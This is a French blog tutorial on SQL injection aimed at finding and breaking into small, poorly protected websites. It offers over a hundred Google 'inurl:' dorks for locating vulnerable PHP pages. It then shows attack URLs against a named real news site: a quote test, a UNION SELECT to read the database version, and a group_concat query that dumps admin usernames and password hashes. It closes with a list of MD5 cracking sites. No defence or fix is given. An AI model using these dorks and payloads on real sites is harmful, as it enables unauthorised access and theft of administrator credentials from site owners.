Post Populaire


Injections SQL

Sebdelkil vous présente un petit tuto sur l'injection SQL, demandé par notre jolie "Cl4r4h4ck" lectrice depuis deja 4 ans du site Sebdelkil,  vous allez voire que beaucoup de "petit" sites, sont très mal protéger contre ce type de failles!
Google encore une fois, va bien nous aidez, nous allons nous en servir pour trouver les dorks (bien que je vous fournie une bonne petite liste ci dessous), et bien sur trouver les sites, je n'es évidement pas besoins de vous dirent que ce genre d’attaque ne fonctionne pas sur les gros sites comme amazone, le bon coin, la redoute ..... bref....  
Une Injection SQL, c’est un type d’exploitation de faille sur un système interagissant avec une base de données, en injectant une requête pour par exemple, récupérer les Login de la Base De Données....  
Maintenant, nous allons utiliser Google pour trouver des sites vulnérables aux injections SQL.

Pour se faire, cherchez sur google une des lignes ci-dessous :

inurl:aboutbook.php?id=
inurl:age.php?file=
inurl:age.php?id=
inurl:ageid=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:art.php?idm=
inurl:articipant.php?id=
inurl:article.php?ID=
inurl:artikelinfo.php?id=
inurl:avd_start.php?avd=
inurl:band_info.php?id=
inurl:buy.php?category=
inurl:category.php?id=
inurl:channel_id=
inurl:chappies.php?id=
inurl:clanek.php4?id=
inurl:clubpage.php?id=
inurl:collectionitem.php?id=
inurl:communique_detail.php?id=
inurl:curriculum.php?id=
inurl:declaration_more.php?decl_id=
inurl:detail.php?ID=
inurl:download.php?id=
inurl:downloads_info.php?id=
inurl:erson.php?id= inurl:event.php?id=
inurl:faq2.php?id= inurl:fellows.php?id=
inurl:ffer.php?idf= inurl:fiche_spectacle.php?id=
inurl:forum_bds.php?num=
inurl:galeri_info.php?l=
inurl:gallery.php?id=
inurl:game.php?id=
inurl:games.php?id=
inurl:historialeer.php?num=
inurl:hosting_info.php?id=
inurl:humor.php?id=
inurl:index.php?=
inurl:index.php?id=
inurl:index2.php?option=
inurl:iniziativa.php?in=
inurl:item_id=
inurl:kategorie.php4?id=
inurl:labels.php?id=
inurl:lay_old.php?id=
inurl:loadpsb.php?id=
inurl:look.php?ID=
inurl:main.php?id=
inurl:material.php?id=
inurl:memberInfo.php?id=
inurl:news.php?id=
inurl:news_display.php?getid=
inurl:news_view.php?id=
inurl:newscat.php?id=
inurl:newsDetail.php?id=
inurl:news-full.php?id=
inurl:newsid=
inurl:newsitem.php?num=
inurl:newsone.php?id=
inurl:newsticker_info.php?idn=
inurl:offer.php?idf=
inurl:op.php?id=
inurl:opinions.php?id=
inurl:ost.php?id=
inurl:page.php?file=
inurl:page.php?id=
inurl:Pageid=
inurl:pages.php?id=
inurl:participant.php?id=
inurl:person.php?id=
inurl:pinions.php?id=
inurl:play_old.php?id=
inurl:pop.php?id=
inurl:post.php?id=
inurl:preview.php?id=
inurl:prod_detail.php?id=
inurl:prod_info.php?id=
inurl:product.php?id=
inurl:product_ranges_view.php?ID=
inurl:productdetail.php?id=
inurl:productinfo.php?id=
inurl:product-item.php?id=
inurl:produit.php?id=
inurl:profile_view.php?id=
inurl:publications.php?id=
inurl:ray.php?id=
inurl:read.php?id=
inurl:readnews.php?id=
inurl:reagir.php?num=
inurl:releases.php?id=
inurl:review.php?id=
inurl:rod_info.php?id=
inurl:roduct.php?id=
inurl:roduct_ranges_view.php?ID=
inurl:roductdetail.php?id=
inurl:roductinfo.php?id=
inurl:roduct-item.php?id=
inurl:roduit.php?id=
inurl:rofile_view.php?id=
inurl:rub.php?idr=
inurl:rubp.php?idr=
inurl:rubrika.php?idr=
inurl:section.php?id=
inurl:select_biblio.php?id=
inurl:sem.php3?id=
inurl:shop.php?do=part&id=
inurl:shop_category.php?id=
inurl:shopping.php?id=
inurl:show.php?id=
inurl:show_an.php?id=
inurl:showimg.php?id=
inurl:shredder-categories.php?id=
inurl:spr.php?id= inurl:sql.php?id=
inurl:staff_id=
inurl:story.php?id=
inurl:sw_comment.php?id=
inurl:tekst.php?idt=
inurl:theme.php?id=
inurl:title.php?id=
inurl:top10.php?cat=
inurl:tradeCategory.php?id=
inurl:trainers.php?id=
inurl:transcript.php?id=
inurl:tray-Questions-View.php?num=
inurl:ublications.php?id=
inurl:view.php?id=
inurl:view_faq.php?id=
inurl:view_product.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=

inurl:viewshowdetail.php?id=
inurl:website.php?id=
inurlrod_detail.php?id=


Savoir si le site est vulnérable à la faille
Voici un exemple :
Ajoutez un ‘ (quote) apres l’ID
http://www.nessma.tv/news.php?id=145'

Si vous obtenez ceci :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
c’est que le site est vulnérable!
Voilà, maintenant que nous avons trouvé notre site avec la faille, nous allons faire quelques opérations avec.

Trouver la version de SQL
http://www.nessma.tv/news.php?id=145 union all select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15
Ici, 4,5,6,7,8,9,10,11,12,13,14,15 sont les champs vulnérables
Trouver le login/mot de passe de l’admin
Voici le but de cet exploit ! trouver les logins !
http://www.nessma.tv/news.php?id=145 union all select 1,2,group_concat(ru_Admin_Username,0x3a,ru_Admin_Password),4,5,6,7,8,9,10,11,12, ​​ ​13,14,15 from ru_Admin--
Nous allons trouver des résultats de ce genre :   admin:admRIvuxHahkQ 
le mot de passe est crypté en MD5 comme vous pouvez le voir, nous allons donc le décrypter avec des rainbow-tables :
www.md5oogle.com – 6 353 625 hash
www.hashmash.com – 1,611,191 hash
www.md5decryption.com – 872,145 hash
www.md5decrypter.com – 583,441 hash
www.md5decrypter.co.uk – 41,568,541 hash

- sebdelkil 2009-2015 - Aucun droit réservé -